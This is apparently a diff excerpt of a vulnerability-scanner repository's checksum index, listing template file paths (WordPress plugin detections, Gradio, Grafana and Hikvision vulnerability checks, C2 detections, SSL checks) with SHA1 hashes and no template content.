http/technologies/wordpress/plugins/table-of-contents-plus.yaml:334733285e3627f5416feca5df9dd89ac91faf4f
http/technologies/wordpress/plugins/tablepress.yaml:f3fcc4bad9199cd1aca78c75a093d7b23e4b65b7
http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:c0491d20b5b59729545cdf68cfb88346172acb75
http/technologies/wordpress/plugins/templately.yaml:5b62413b897c47d3ae86d5e5b92ee75ceaf0856e
http/technologies/wordpress/plugins/the-events-calendar.yaml:87f10f88c8e44bc416536092aa5d591554817b0c
http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5
http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5
http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd
http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033
http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68
http/technologies/wordpress/plugins/tinymce-advanced.yaml:76022e8f7ef5517e05c6c59e573a7bfa55b4c121
http/technologies/wordpress/plugins/translatepress-multilingual.yaml:adb0d3eafbafe1195ddb6477095d704778a8dc1a
http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:975e3a1099ec6fad3eccc2566820dcf1e685ffda
http/technologies/wordpress/plugins/under-construction-page.yaml:3732901ea346a990c983d862b72b632cc1a09ae1
http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e
http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6
http/technologies/wordpress/plugins/updraftplus.yaml:192fcb7b7fb8ab505313883440bf4b56cc8b8199
http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47
http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8
http/technologies/wordpress/plugins/user-role-editor.yaml:9a07be64d03f0057f9f3418b4e2f22af3fe3c8e4
http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c
http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef
http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38
http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8
http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074
http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9
http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997
http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398
http/technologies/wordpress/plugins/w3-total-cache.yaml:32fc287b225ee5187b29fa9db688b3e8a10de4a3
http/technologies/wordpress/plugins/webp-converter-for-media.yaml:f5ef65853e4102642c561aefb18f4a2a3cf738b3
http/technologies/wordpress/plugins/webp-express.yaml:cb2c692702481e29e279b3efafa91942c342b22c
http/technologies/wordpress/plugins/widget-importer-exporter.yaml:5483fa8794ae7790c5c42c689a9f754ea3f07b66
http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:731ab6979ce9daafb6945d57a294575a4e16ee00
http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:e0edbe4345b9310bf43798ae0da56ca339fac2a2
http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f639503d1041219d839f06177a93cc4e1c125683
http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200
http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda
http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856
http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc
http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec
http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b
http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77
http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f
http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b
http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f
http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107
http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:008839d74144ff033f920547a96bca6cfc81c4f0
http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:6629c332ea3550d95e79b63dbbbc1490c6498e79
http/technologies/wordpress/plugins/woocommerce-payments.yaml:be1f5158fe2d84e9d0bbc38f555c0c0744991a57
http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:649f5ae860b1b699c6278b929f2bf6f1f4b01dd5
http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:bdf13f27fd04f4b55c741da62a8394bf501cc988
http/technologies/wordpress/plugins/woocommerce-services.yaml:db3ba138c78b428608a2297fa163fc8242bd41e1
http/technologies/wordpress/plugins/woocommerce.yaml:3d54c5afdbb12b79862abe00f70cc4e88157aebd
http/technologies/wordpress/plugins/wordfence.yaml:6c9fed80955cabc719854bd25f58bd0690160f35
http/technologies/wordpress/plugins/wordpress-importer.yaml:31bb724946ce8b3f1910d411ef6cceb3a82299d0
http/technologies/wordpress/plugins/wordpress-seo.yaml:e391bccb91671e970aad5f3c5e39ce6ff7843635
http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319
http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c
http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083
http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402
http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67
http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348
http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342
http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85
http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504
http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2
http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec
http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9
http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859
http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc
http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca
http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030
http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792
http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb
http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b
http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649
http/technologies/wordpress/plugins/worker.yaml:cbc1aab969c2ee6c8967ba58da4bf82c9813e057
http/technologies/wordpress/plugins/wp-crontrol.yaml:6768e8111ee4bc3e03ea010ec819c8ae89307aac
http/technologies/wordpress/plugins/wp-fastest-cache.yaml:c2f61ee62a8964c5c665f984215149110f742a37
http/technologies/wordpress/plugins/wp-file-manager.yaml:0e6e0081e9084d64463458aa9be206502c567da5
http/technologies/wordpress/plugins/wp-google-maps.yaml:e62d6ddece58a5ba16e84216c1f63ac36968f316
http/technologies/wordpress/plugins/wp-mail-smtp.yaml:c467ee5cbfdd02c5adcfa98a7695e5122f9c2d2c
http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:48e332cad9a1d19a2aabf67fe98f4ae3adafdbbc
http/technologies/wordpress/plugins/wp-migrate-db.yaml:806081b68fa7cf5077fd49ddc5630c2e2c71fee5
http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:c2b7fa89f79127f934f19ea45bb77caef8a80809
http/technologies/wordpress/plugins/wp-optimize.yaml:0a7ca3353d41c8c3e8b5447a33c39423fce4187f
http/technologies/wordpress/plugins/wp-pagenavi.yaml:c84a6d103d3de849c9ed0555d2ad69c28c1eab9a
http/technologies/wordpress/plugins/wp-reset.yaml:896010702419036225035602aedd392d3350e47c
http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:e82e8cfc2c9bacad123dd83835d3e962a4414424
http/technologies/wordpress/plugins/wp-rollback.yaml:3d91677de85deea74983f64d511e1b1493cfc670
http/technologies/wordpress/plugins/wp-seopress.yaml:da1a42691d0ae6be2fc8d2eaa4647d1f19cab43c
http/technologies/wordpress/plugins/wp-sitemap-page.yaml:11620a242ece44fa6104a9af139a0265b0fb69dd
http/technologies/wordpress/plugins/wp-smushit.yaml:cb1f05141b8da2beab64f4021338330a8d4ddd8d
http/technologies/wordpress/plugins/wp-statistics.yaml:9cb105762cd4672310a48a26249f9ee2c1f9ba7a
http/technologies/wordpress/plugins/wp-super-cache.yaml:76463e3816905d47b9a1ecad6f91c84300906d0d
http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e
http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870
http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43
http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb
http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d
http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d
http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:3be56d7fb0ddbfcdff606c21ba2eaf1a884c849b
http/technologies/wordpress/plugins/wpcf7-redirect.yaml:6c85af103bde9cb10c025a9302bb6f9613cc84eb
http/technologies/wordpress/plugins/wpforms-lite.yaml:6f3b08859873ef78b2a257fd3cc5d6360c6e4fca
http/technologies/wordpress/plugins/wps-hide-login.yaml:c1bab37bd47f9049452add340af21e656debd1db
http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:e629246d07264a041798ed6919cd6f787548381e
http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5
http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9
http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:7d47684a8d95444348f59a10ee1e2be73c6dd06a
http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e
http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5
http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f
@ -7900,6 +7907,7 @@ http/vulnerabilities/gradio/gradio-lfi.yaml:9d052b9053b30850ed2b42140a4e54ba3371
http/vulnerabilities/gradio/gradio-ssrf.yaml:c0a20caa4fb295071efb720890b54bee093c0fda
http/vulnerabilities/grafana/grafana-file-read.yaml:7f8fa8a6408dbbd25e7c33bc203024a131b85704
http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f
http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml:d4a5f3853a70adea141b8d68ee9a7c2d6ef44545
http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54
http/vulnerabilities/hikvision/hikvision-ivms-file-upload-rce.yaml:94de4453e34e7b36379a10dc4966aa54f3582aeb
http/vulnerabilities/hikvision/hikvision-js-files-upload.yaml:cdcf6ca5518af130ebd36c1531365f6bb79001c5
@ -8739,6 +8747,7 @@ javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea4
javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27
javascript/udp/detection/tftp-detect.yaml:983f405d3c4b95ad9114371625cab9cdf8e28032
network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350
network/c2/7777botnet.yaml:35a2e313d6ac2cc06e061282308083ad0e3c9964
network/c2/darkcomet-trojan.yaml:adde1a1a06abb9b7c86ee78e538769eaf8281d6e
network/c2/darktrack-rat-trojan.yaml:87d27aa07133993bc44f0410eafb1385446c6020
network/c2/orcus-rat-trojan.yaml:391539519819acb2999e30b98fbd9d789c6395ae
@ -8920,7 +8929,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
templates-checksum.txt:d0a78187b729d7b6b5db22840e248510961fae5e
templates-checksum.txt:00e78793f9b81f4609f8edff1855dc716dced779
vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0